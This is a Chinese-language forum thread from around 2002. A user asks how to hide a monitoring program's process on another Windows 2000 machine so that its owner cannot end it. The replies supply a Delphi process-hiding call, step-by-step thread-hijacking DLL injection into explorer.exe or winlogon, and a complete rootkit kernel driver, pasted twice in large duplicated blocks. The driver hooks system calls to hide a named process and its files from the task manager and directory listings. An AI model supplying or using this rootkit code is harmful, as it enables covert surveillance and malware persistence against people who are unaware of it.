1,183
社区成员
发帖
与我相关
我的任务
分享请问:如何将一个进程在win2k的进程列表中隐藏
各位大侠好,我做了一个程序,对另外一台机器进行监控,但是我不想让他结束我的进程,试问有没有方法隐藏进程,达到隐秘的效果,谢谢。
...全文
请发表友善的回复…
发表回复
ldwolf 2003-03-30
- 打赏
- 举报
a
yggg 2002-12-13
- 打赏
- 举报
请问Rainsea(飞龙在天) ,如果你用过的话,能不能说的比较详细一点儿。因为,我没有用过,如果测试的话,不知道会发生什么。谢谢
Billy_Chen28 2002-12-12
- 打赏
- 举报
/////////////////////////////////////////////////////////////////////////////
NTSTATUS NewZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
BOOL bLastOne;
int iPos;
int iLeft;
pDirEntry pCurrDir;
pDirEntry pLastDir;
GetProcessName(szProcessName);
ntStatus = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
hFile,
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);
if (!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, "Install", 7) == 0)
goto Exit0;
pCurrDir = (pDirEntry)FileInformationBuffer;
pLastDir = NULL;
do
{
bLastOne = !(pCurrDir->dwLenToNext);
if (RtlCompareMemory((PVOID)&pCurrDir->suName[0], (PVOID)&g_wszHideFileName[0], 14) == 14)
{
if (bLastOne)
{
if (pCurrDir == (pDirEntry)FileInformationBuffer)
ntStatus = 0x80000006;
else
pLastDir->dwLenToNext = 0;
break;
}
else
{
iPos = ((ULONG)pCurrDir) - (ULONG)FileInformationBuffer;
iLeft = (DWORD)FileInformationBufferLength - iPos - pCurrDir->dwLenToNext;
RtlCopyMemory((PVOID)pCurrDir, (PVOID)((char *)pCurrDir + pCurrDir->dwLenToNext), (DWORD)iLeft);
continue;
}
}
pLastDir = pCurrDir;
pCurrDir = (pDirEntry)((char *)pCurrDir + pCurrDir->dwLenToNext );
} while (!bLastOne);
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
NTSTATUS NewZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
BOOL bLastOne;
int iPos;
int iLeft;
pDirEntry pCurrDir;
pDirEntry pLastDir;
GetProcessName(szProcessName);
ntStatus = ((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile)) (
hFile,
hEvent,
IoApcRoutine,
IoApcContext,
pIoStatusBlock,
FileInformationBuffer,
FileInformationBufferLength,
FileInfoClass,
bReturnOnlyOneEntry,
PathMask,
bRestartQuery);
if (!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, "Install", 7) == 0)
goto Exit0;
pCurrDir = (pDirEntry)FileInformationBuffer;
pLastDir = NULL;
do
{
bLastOne = !(pCurrDir->dwLenToNext);
if (RtlCompareMemory((PVOID)&pCurrDir->suName[0], (PVOID)&g_wszHideFileName[0], 14) == 14)
{
if (bLastOne)
{
if (pCurrDir == (pDirEntry)FileInformationBuffer)
ntStatus = 0x80000006;
else
pLastDir->dwLenToNext = 0;
break;
}
else
{
iPos = ((ULONG)pCurrDir) - (ULONG)FileInformationBuffer;
iLeft = (DWORD)FileInformationBufferLength - iPos - pCurrDir->dwLenToNext;
RtlCopyMemory((PVOID)pCurrDir, (PVOID)((char *)pCurrDir + pCurrDir->dwLenToNext), (DWORD)iLeft);
continue;
}
}
pLastDir = pCurrDir;
pCurrDir = (pDirEntry)((char *)pCurrDir + pCurrDir->dwLenToNext );
} while (!bLastOne);
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
Billy_Chen28 2002-12-12
- 打赏
- 举报
刚才的程序只对98有效,给你找到一个2000下有效的代码,你看看
以下是对2000有效的代码,自己转换一下:
NT/2000下面用驱动实现真正的进程,文件,目录隐藏
qinzm
最近看了一下RootKit的代码,把其中进程文件目录隐藏的代码整理出来,
重新编译成一个完整可用的驱动,可以实现定制的进程文件目录的隐藏,
隐藏后,进程管理器无法看到,文件和目录也无法看到,但知道绝对路径的
情况下,可以正常使用隐藏的文件,只对NT/2000有效,编译后的驱动只有2k多.
程序用于实验,请勿非法使用
//////////////////////////////////////////////////////////////////////////////////////
//
// FileName : D:\Temp\Hide\Driver.c
// Version : 1.0
// Creater : QinzhiMing
// Date : 2002:2:25 14:42
// Comment :
//
//////////////////////////////////////////////////////////////////////////////////////
#include "ntddk.h"
#include "Driver.h"
#include "stdio.h"
/////////////////////////////////////////////////////////////////////////////
char g_szHideProcName[] = "Install.exe";
WCHAR g_wszHideFileName[] = L"Install";
ULONG g_nProcessNameOffset;
BOOL g_hide_proc = TRUE;
/////////////////////////////////////////////////////////////////////////////
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegisterPath)
{
int i;
NTSTATUS ntStatus;
PDEVICE_OBJECT pDeviceObject;
WCHAR wchrDeviceName[] = L"\\Device\\Hide";
WCHAR wchrDeviceLinkName[] = L"\\DosDevices\\Hide";
UNICODE_STRING wszDeviceName;
UNICODE_STRING wszDeviceLinkName;
RtlInitUnicodeString(&wszDeviceName, wchrDeviceName);
ntStatus = IoCreateDevice(pDriverObject, 0, &wszDeviceName, 0x00008000, 0, FALSE, &pDeviceObject);
if (ntStatus != STATUS_SUCCESS)
goto Exit0;
RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
ntStatus = IoCreateSymbolicLink(&wszDeviceLinkName, &wszDeviceName);
if (ntStatus != STATUS_SUCCESS)
{
IoDeleteDevice(pDeviceObject);
goto Exit0;
}
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
pDriverObject->MajorFunction[i] = OnDriverDispatch;
pDriverObject->DriverUnload = OnDriverUnload;
GetProcessNameOffset();
HookSysCall();//Hook系统服务
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
void GetProcessNameOffset()
{
int i;
PEPROCESS CurrentProc;
CurrentProc = PsGetCurrentProcess();
for (i = 0; i < 3 * PAGE_SIZE; i++)
{
if(!strncmp("System", (PCHAR)CurrentProc + i, strlen("System")))
g_nProcessNameOffset = i;
}
}
/////////////////////////////////////////////////////////////////////////////
BOOL GetProcessName(PCHAR pszName)
{
char *pszTempName;
PEPROCESS CurrentProc;
if (g_nProcessNameOffset)
{
CurrentProc = PsGetCurrentProcess();
pszTempName = (PCHAR)CurrentProc + g_nProcessNameOffset;
strncpy(pszName, pszTempName, NT_PROCNAMELEN);
pszName[NT_PROCNAMELEN] = 0;
return TRUE;
}
return FALSE;
}
/////////////////////////////////////////////////////////////////////////////
void HookSysCall()
{
OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = NewZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = NewZwQueryDirectoryFile;
_asm sti;
}
/////////////////////////////////////////////////////////////////////////////
void UnHookSysCall()
{
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = OldZwQueryDirectoryFile;
_asm sti;
}
/////////////////////////////////////////////////////////////////////////////
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
ANSI_STRING astrProcName;
ANSI_STRING astrHideProcName;
struct SYSTEM_PROCESS *Curr;
struct SYSTEM_PROCESS *Prev;
RtlInitAnsiString(&astrHideProcName, g_szHideProcName);
GetProcessName(szProcessName);
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
if(!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, g_szHideProcName, strlen(g_szHideProcName)) == 0)//比较当前进程是否隐藏进程,是就退出,不对隐藏进程的做任何限制
goto Exit0;
if (SystemInformationClass != 5)
goto Exit0;
Curr = (struct SYSTEM_PROCESS *)SystemInformation;
Prev = NULL;
Loop:
if (Curr == NULL)
goto Exit0;
RtlUnicodeStringToAnsiString(&astrProcName, &(Curr->ProcessName), TRUE);
if ((astrProcName.Length > 0) && (astrProcName.Length < 255))
;
else
goto Next;
if (RtlCompareString(&astrProcName, &astrHideProcName, TRUE) != 0)
goto Next;
if (Prev)
{
if (Curr->NextEntryDelta)
Prev->NextEntryDelta += Curr->NextEntryDelta;
else
Prev->NextEntryDelta = 0;
}
else
{
if (Curr->NextEntryDelta)
(char *)SystemInformation += Curr->NextEntryDelta;
else
SystemInformation = NULL;
}
Next:
RtlFreeAnsiString(&astrProcName);
Prev = Curr;
if (Curr->NextEntryDelta)
(char *)Curr += Curr->NextEntryDelta;
else
Curr = NULL;
goto Loop;
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
NTSTATUS OnDriverDispatch(IN PDEVICE_OBJECT pDeviceObject, IN PIRP Irp)
{
/* PIO_STACK_LOCATION IrpStack;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IrpStack = IoGetCurrentIrpStackLocation(Irp);*/
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
/////////////////////////////////////////////////////////////////////////////
void OnDriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
WCHAR wchrDeviceLinkName[] = L"\\DosDevices\\Hide";
UNICODE_STRING wszDeviceLinkName;
UnHookSysCall();
RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
IoDeleteSymbolicLink(&wszDeviceLinkName);
IoDeleteDevice(pDriverObject->DeviceObject);
}
以下是对2000有效的代码,自己转换一下:
NT/2000下面用驱动实现真正的进程,文件,目录隐藏
qinzm
最近看了一下RootKit的代码,把其中进程文件目录隐藏的代码整理出来,
重新编译成一个完整可用的驱动,可以实现定制的进程文件目录的隐藏,
隐藏后,进程管理器无法看到,文件和目录也无法看到,但知道绝对路径的
情况下,可以正常使用隐藏的文件,只对NT/2000有效,编译后的驱动只有2k多.
程序用于实验,请勿非法使用
//////////////////////////////////////////////////////////////////////////////////////
//
// FileName : D:\Temp\Hide\Driver.c
// Version : 1.0
// Creater : QinzhiMing
// Date : 2002:2:25 14:42
// Comment :
//
//////////////////////////////////////////////////////////////////////////////////////
#include "ntddk.h"
#include "Driver.h"
#include "stdio.h"
/////////////////////////////////////////////////////////////////////////////
char g_szHideProcName[] = "Install.exe";
WCHAR g_wszHideFileName[] = L"Install";
ULONG g_nProcessNameOffset;
BOOL g_hide_proc = TRUE;
/////////////////////////////////////////////////////////////////////////////
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject, IN PUNICODE_STRING pRegisterPath)
{
int i;
NTSTATUS ntStatus;
PDEVICE_OBJECT pDeviceObject;
WCHAR wchrDeviceName[] = L"\\Device\\Hide";
WCHAR wchrDeviceLinkName[] = L"\\DosDevices\\Hide";
UNICODE_STRING wszDeviceName;
UNICODE_STRING wszDeviceLinkName;
RtlInitUnicodeString(&wszDeviceName, wchrDeviceName);
ntStatus = IoCreateDevice(pDriverObject, 0, &wszDeviceName, 0x00008000, 0, FALSE, &pDeviceObject);
if (ntStatus != STATUS_SUCCESS)
goto Exit0;
RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
ntStatus = IoCreateSymbolicLink(&wszDeviceLinkName, &wszDeviceName);
if (ntStatus != STATUS_SUCCESS)
{
IoDeleteDevice(pDeviceObject);
goto Exit0;
}
for (i = 0; i < IRP_MJ_MAXIMUM_FUNCTION; i++)
pDriverObject->MajorFunction[i] = OnDriverDispatch;
pDriverObject->DriverUnload = OnDriverUnload;
GetProcessNameOffset();
HookSysCall();//Hook系统服务
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
void GetProcessNameOffset()
{
int i;
PEPROCESS CurrentProc;
CurrentProc = PsGetCurrentProcess();
for (i = 0; i < 3 * PAGE_SIZE; i++)
{
if(!strncmp("System", (PCHAR)CurrentProc + i, strlen("System")))
g_nProcessNameOffset = i;
}
}
/////////////////////////////////////////////////////////////////////////////
BOOL GetProcessName(PCHAR pszName)
{
char *pszTempName;
PEPROCESS CurrentProc;
if (g_nProcessNameOffset)
{
CurrentProc = PsGetCurrentProcess();
pszTempName = (PCHAR)CurrentProc + g_nProcessNameOffset;
strncpy(pszName, pszTempName, NT_PROCNAMELEN);
pszName[NT_PROCNAMELEN] = 0;
return TRUE;
}
return FALSE;
}
/////////////////////////////////////////////////////////////////////////////
void HookSysCall()
{
OldZwQuerySystemInformation = (ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation));
OldZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile));
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = NewZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = NewZwQueryDirectoryFile;
_asm sti;
}
/////////////////////////////////////////////////////////////////////////////
void UnHookSysCall()
{
_asm cli;
(ZWQUERYSYSTEMINFORMATION)(SYSTEMSERVICE(ZwQuerySystemInformation)) = OldZwQuerySystemInformation;
(ZWQUERYDIRECTORYFILE)(SYSTEMSERVICE(ZwQueryDirectoryFile)) = OldZwQueryDirectoryFile;
_asm sti;
}
/////////////////////////////////////////////////////////////////////////////
NTSTATUS NewZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
NTSTATUS ntStatus;
CHAR szProcessName[PROCNAMELEN];
ANSI_STRING astrProcName;
ANSI_STRING astrHideProcName;
struct SYSTEM_PROCESS *Curr;
struct SYSTEM_PROCESS *Prev;
RtlInitAnsiString(&astrHideProcName, g_szHideProcName);
GetProcessName(szProcessName);
ntStatus = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(
SystemInformationClass,
SystemInformation,
SystemInformationLength,
ReturnLength);
if(!NT_SUCCESS(ntStatus))
goto Exit0;
if (memcmp(szProcessName, g_szHideProcName, strlen(g_szHideProcName)) == 0)//比较当前进程是否隐藏进程,是就退出,不对隐藏进程的做任何限制
goto Exit0;
if (SystemInformationClass != 5)
goto Exit0;
Curr = (struct SYSTEM_PROCESS *)SystemInformation;
Prev = NULL;
Loop:
if (Curr == NULL)
goto Exit0;
RtlUnicodeStringToAnsiString(&astrProcName, &(Curr->ProcessName), TRUE);
if ((astrProcName.Length > 0) && (astrProcName.Length < 255))
;
else
goto Next;
if (RtlCompareString(&astrProcName, &astrHideProcName, TRUE) != 0)
goto Next;
if (Prev)
{
if (Curr->NextEntryDelta)
Prev->NextEntryDelta += Curr->NextEntryDelta;
else
Prev->NextEntryDelta = 0;
}
else
{
if (Curr->NextEntryDelta)
(char *)SystemInformation += Curr->NextEntryDelta;
else
SystemInformation = NULL;
}
Next:
RtlFreeAnsiString(&astrProcName);
Prev = Curr;
if (Curr->NextEntryDelta)
(char *)Curr += Curr->NextEntryDelta;
else
Curr = NULL;
goto Loop;
Exit0:
return ntStatus;
}
/////////////////////////////////////////////////////////////////////////////
NTSTATUS OnDriverDispatch(IN PDEVICE_OBJECT pDeviceObject, IN PIRP Irp)
{
/* PIO_STACK_LOCATION IrpStack;
Irp->IoStatus.Status = STATUS_SUCCESS;
Irp->IoStatus.Information = 0;
IrpStack = IoGetCurrentIrpStackLocation(Irp);*/
Irp->IoStatus.Status = STATUS_SUCCESS;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return Irp->IoStatus.Status;
}
/////////////////////////////////////////////////////////////////////////////
void OnDriverUnload(IN PDRIVER_OBJECT pDriverObject)
{
WCHAR wchrDeviceLinkName[] = L"\\DosDevices\\Hide";
UNICODE_STRING wszDeviceLinkName;
UnHookSysCall();
RtlInitUnicodeString(&wszDeviceLinkName, wchrDeviceLinkName);
IoDeleteSymbolicLink(&wszDeviceLinkName);
IoDeleteDevice(pDriverObject->DeviceObject);
}
rainsea 2002-12-12
- 打赏
- 举报
让你自己的程序占有ring0级别,即使别人在进程里看到了,也不让它杀死。
除非有卸载的权限,他才可以卸载。
除非有卸载的权限,他才可以卸载。
rainsea 2002-12-12
- 打赏
- 举报
这些都是不能深度隐藏的。
除非
1:得到Explorer.exe进程中任意一个线程的ID.
2:根据这个线程的ID,得到这个线程的句柄Handle
3:挂起这个线程,并保存线程当前的“上下文”
4:改变这个线程的EIP指针,使它指向我们装载DLL的函数(InjectCodeFun),然后恢复这个线程。
5:我们的装载DLL的函数运行完成后,再次挂起这个线程,使用我们以前保存的“上下文”,恢复这个线程到它被改变前的状态,并继续运行。
这种方法是最强大的,甚至可以进入优先级为高的winlogon。
除非
1:得到Explorer.exe进程中任意一个线程的ID.
2:根据这个线程的ID,得到这个线程的句柄Handle
3:挂起这个线程,并保存线程当前的“上下文”
4:改变这个线程的EIP指针,使它指向我们装载DLL的函数(InjectCodeFun),然后恢复这个线程。
5:我们的装载DLL的函数运行完成后,再次挂起这个线程,使用我们以前保存的“上下文”,恢复这个线程到它被改变前的状态,并继续运行。
这种方法是最强大的,甚至可以进入优先级为高的winlogon。
Billy_Chen28 2002-12-12
- 打赏
- 举报
type
TRegisterServiceProcess = function (dwProcessID, dwType:DWord) : DWORD; stdcall;
{$R *.DFM}
procedure TForm1.FormCreate(Sender: TObject);
var
H :THandle;
RegisterServiceProcess: TRegisterServiceProcess;
begin
H:=LoadLibrary('KERNEL32.DLL');
RegisterServiceProcess:=GetProcAddress(H, 'RegisterServiceProcess');
RegisterServiceProcess (GetCurrentProcessID, 1);
FreeLibrary(H);
end;
TRegisterServiceProcess = function (dwProcessID, dwType:DWord) : DWORD; stdcall;
{$R *.DFM}
procedure TForm1.FormCreate(Sender: TObject);
var
H :THandle;
RegisterServiceProcess: TRegisterServiceProcess;
begin
H:=LoadLibrary('KERNEL32.DLL');
RegisterServiceProcess:=GetProcAddress(H, 'RegisterServiceProcess');
RegisterServiceProcess (GetCurrentProcessID, 1);
FreeLibrary(H);
end;
智商无下限 2002-12-12
- 打赏
- 举报
不启动她就可以了!呵呵。。。
你搜一搜吧!有很多这样的帖子!
基本上都是要把你的程序寄存别人的程序中
你搜一搜吧!有很多这样的帖子!
基本上都是要把你的程序寄存别人的程序中
yggg 2002-12-12
- 打赏
- 举报
有没有delphi的方法
hecCIBN 2002-12-12
- 打赏
- 举报
学习
